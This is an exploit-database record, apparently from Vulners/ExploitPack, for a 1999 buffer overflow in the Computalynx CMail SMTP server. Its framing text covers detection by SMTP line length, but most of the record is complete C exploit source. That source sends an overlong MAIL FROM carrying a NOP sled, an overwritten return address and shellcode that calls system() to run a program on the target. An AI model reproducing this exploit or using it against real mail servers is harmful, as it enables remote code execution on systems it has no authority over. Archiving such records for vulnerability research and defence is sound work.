Description
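Computalynx CMail 2.3 SP22.4 - SMTP Buffer Overflow
The CMail SMTP service overflows a buffer when it receives an overlong MAIL FROM: argument, which may allow a remote attacker to execute arbitrary code on the mail server. The record below lists no CVE identifier and names no fixed version, and the header of the embedded source names the affected build as "2.3 SP2", so confirm the exact affected version against the vendor before relying on the title. SMTP limits a command line to 512 octets including the CRLF, so a MAIL FROM: line far beyond that length is a practical criterion for detection and for filtering at a relay or proxy in front of the server.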
{"lastseen": "2020-04-01T19:04:10", "references": [], "description": "\nComputalynx CMail 2.3 SP22.4 - SMTP Buffer Overflow", "edition": 1, "reporter": "UNYUN", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "1999-09-13T00:00:00", "title": "Computalynx CMail 2.3 SP22.4 - SMTP Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "bulletinFamily": "exploit", "cvelist": [], "modified": "1999-09-13T00:00:00", "id": "EXPLOITPACK:7DC32F047C099E2B9F02872AFDCD5938", "href": "", "viewCount": 3, "sourceData": "// source: https://www.securityfocus.com/bid/633/info\n\nThere is a buffer overflow in the CMail SMTP service (long MAIL FROM:) that may allow an attacker to execute arbitrary code on the target server. \n\nCMail Server\n\n/*=============================================================================\n CMAIL Server 2.3 SP2 Exploit for Windows98\n The Shadow Penguin Security (http://shadowpenguin.backsection.net)\n Written by UNYUN (shadowpenguin@backsection.net)\n =============================================================================\n*/\n#include <stdio.h>\n#include <string.h>\n#include <netdb.h>\n#include <netinet/in.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <sys/time.h>\n#include <unistd.h>\n\n#define BUFSIZE 2000\n#define SMTP_PORT 25\n#define RETADR 626\n#define JMPADR 622\n#define JMPOFS 6\n#define EIP 0xbff7a06b\n#define NOP 0x90\n#define JMPS 0xeb\n\nunsigned char 
exploit_code[200]={\n0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,\n0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,\n0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,\n0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,\n0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,\n0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,\n0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,\n0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,\n0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,\n0xFF, 0x00};\nunsigned char cmdbuf[200]=\"msvcrt.dll.system.exit.welcome.exe\";\n\nint main(int argc,char *argv[])\n{\n struct hostent *hs;\n struct sockaddr_in cli;\n char packetbuf[BUFSIZE+3000],buf[BUFSIZE];\n int sockfd,i,ip;\n\n if (argc<2){\n printf(\"usage\\n %s HostName\\n\",argv[0]);\n exit(1);\n }\n bzero(&cli, sizeof(cli));\n cli.sin_family = AF_INET;\n cli.sin_port = htons(SMTP_PORT);\n if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){\n if ((hs=gethostbyname(argv[1]))==NULL){\n printf(\"Can not resolve specified host.\\n\");\n exit(1);\n }\n cli.sin_family = hs->h_addrtype;\n memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);\n }\n\n if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){\n perror(\"socket\"); exit(0);\n }\n\n if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){\n perror(\"connect\"); exit(0);\n }\n while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){\n packetbuf[i]=0;\n if(strchr(packetbuf,'\\n')!=NULL) break;\n }\n\n strcat(exploit_code,cmdbuf);\n exploit_code[65]=strlen(cmdbuf+23);\n memset(buf,0x90,BUFSIZE);\n ip=EIP;\n buf[RETADR ]=ip&0xff;\n buf[RETADR+1]=(ip>>8)&0xff;\n buf[RETADR+2]=(ip>>16)&0xff;\n buf[RETADR+3]=(ip>>24)&0xff;\n buf[JMPADR] =JMPS;\n buf[JMPADR+1]=JMPOFS;\n memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));\n buf[BUFSIZE]=0;\n\n sprintf(packetbuf,\"helo penguin\\r\\n\");\n write(sockfd,packetbuf,strlen(packetbuf));\n while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){\n packetbuf[i]=0;\n if(strchr(packetbuf,'\\n')!=NULL) break;\n }\n 
printf(\"%s\\n\",packetbuf);\n sprintf(packetbuf,\"MAIL FROM: aa <%s@aa.com>\\r\\n\",buf);\n write(sockfd,packetbuf,strlen(packetbuf));\n sleep(100);\n close(sockfd);\n}\n\n-------------------", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645735135}}
{}